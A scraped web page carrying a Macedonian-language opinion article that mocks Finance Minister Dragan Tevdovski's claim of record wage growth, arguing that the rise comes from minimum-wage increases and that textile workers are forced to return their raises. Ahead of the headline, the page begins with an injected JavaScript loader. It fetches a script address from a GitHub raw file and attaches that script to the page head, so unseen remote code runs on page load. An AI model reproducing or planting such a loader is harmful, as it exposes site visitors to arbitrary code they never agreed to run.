;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); И после ВМРО, СДСМ! - Антропол
АктуелноЛокално

И после ВМРО, СДСМ!

Ги паметите оние убави времиња, кога Македонија беше трета економија во регионот? Кога нацијата ни беше најсреќната нација на планетата Земја? Кога толку многу се намалуваше невработеноста, што некои луѓе по два пати се вработија, за сметките да си ги платат? Кога пензиите стрмоглаво растеа? Кога насекаде се градеше? Кога Никола Груевски со челична воља не водеше напред, кон економски просперитет?

Не се грижете, тие времиња се вратија!

„Според последните податоци за државниот завод за статистика, во месец јануари просечната плата за прв пат надмина 24 000 денари и таа изнесува 24 025 денари. Во споредба со јануари минатата година тоа е раст од 1 275 денари, односно 5.6%. Ова е најголем годишен раст на платите од 2010 година“, посочува Драган Тевдоски, министер за финансии во неговата прес конференција. Меѓу останатото, тој посочува кои професии најмногу имаат најголемо зголемување на просечните плати, од кои врвот го заземаат текстилната и кожарската индустрија.

Сензационализмот на прес конференцијата и на официјалното соопштение на владеачката СДСМ е на ниво на сензационализмот на извештаите за постигнатите успеси на ВМРО-ДПМНЕ (единствено надминати во Океанија од „1984“ – не дека ова има некаква врска со прозата на Орвел, туку модерно е да се реферира кон неговата дистопија за секоја случка во општеството). Тоа што Тевдовски не го кажува е суровата реалност зад ваквата амбалажа.

Факт е дека порастот на просечната плата е поради два фактори: порастот на минималната плата и израмнувањето на минималните плати во индустриите за текстил, облека и кожа со останатите индустрии. Истото може да се заклучи и од горенаведената анализа на самиот Тевдовски, кој особено гордо истакна дека израмнувањето на минималните плати е важна бидејќи сите заслужуваат да живеат достоинствен живот (бидејќи, нели, примателот на плата од 12,000 денари ужива доста достоинствен живот, додека синдикалната минимална кошница е над 32,000 денари). Но, колку од оваа плата е навистина исплатена?

Голем број на работнички од текстилната индустрија се жалат дека се приморани да ги вратат парите кои ги добиваат од зголемената плата, со што нивната плата ефективно не е променета. Од газдите се под притисок, синдикатот им е корумпиран и со исклучок на невладината организација „Гласен текстилец“, тие немаат каде да се обратат. Дел од нив веќе се жалат и дека се жртви на ставката за нормиран учинок, а прашање на време е кога бројот на ваквите случаи ќе се зголеми.

Ваквите информации, секако, не се добар материјал за држење на прес конференција од страна на господинот Тевдовски. Тој, секако, не најде за сходно да коментира за големиот степен на сиромаштија во републиката, ниту пак за промената на фокусот на новата влада од социјални реформи кон меѓународна политика. Таквите коментари не се добар ПиАр.